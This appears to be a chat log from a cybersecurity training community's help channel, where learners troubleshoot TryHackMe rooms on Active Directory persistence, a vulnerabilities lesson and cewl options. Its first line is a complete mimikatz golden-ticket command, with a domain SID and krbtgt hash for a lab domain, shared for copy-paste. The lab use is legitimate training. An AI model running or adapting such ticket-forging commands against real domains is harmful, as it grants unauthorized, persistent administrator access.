mimikatz # kerberos::golden /admin:ReallyNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /krbtgt:16f9af38fca3ada405386b3b57366082 /endin:600 /renewmax:10080 /ptt

#

copy/paste and see if that gives an error still

twin bramble
#

thanks I will try

twin bramble
devout bolt
devout bolt
#

ugh - i'm running into a problem in task4 in the room Persisting AD ....getting a new diff error. When I googled it, it sounds like the CA has a misconfiguration? I'm no expert here...i've rerun my previous commands to make sure I was using the correct exported certificate and all....

twin bramble
#

I think there is a problem at the moment

empty mango
#

today i get this bug too, thank you verymuch

livid escarpBOT
#

Gave +1 Rep to @weary urchin

devout bolt
cloud drum
#

is the Vulnerabilities 101 room, task 4 currently doable? the first question's link leads to a deprecated API page, and it doesn't accept the answer provided by the current search at /vuln/search when specifying the correct time range

gloomy berry
#

https://tryhackme.com/room/adventofcyber2023 Task 10 [Day 4] It says, Handle authentication: If the target site is behind a login, you can use the -a flag for form-based authentication. but cewl -h binds -a to a different option, as indicated in a previous screenshot.

#

It also says using --extension allows you to append custom extensions but I don't see --extension as a valid option.

unborn pulsar
gloomy berry
#

I also looked at the source code and there's no mention of --extension